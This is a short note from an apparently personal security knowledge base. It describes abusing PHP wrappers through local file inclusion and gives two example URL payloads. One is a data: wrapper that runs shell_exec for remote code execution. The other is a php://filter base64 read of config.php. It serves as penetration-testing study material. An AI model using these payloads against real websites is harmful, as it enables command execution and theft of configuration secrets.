Security Memo

Search (Ctrl+K)

SearchSearch

Recent Notes

See 1423 more sorted by tag →

PHP wrapper

created Jan 08, 2024updated Apr 16, 20241 min read

PHP wrappers are useful in directory traversal and local file inclusion vulnerabilities in encoding special characters and even achieving RCE.

RCE through data wrapper

rce02-initial-access Relies on PHP LFI to actually interpret the code.

http://example.com/index.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Encode Data through conversion filter

02-initial-access

http://example.com/index.php?file=php://filter/convert.base64-encode/resource=config.php

Files outside of web root may also be accessed through the resource parameter.

Graph View

Backlinks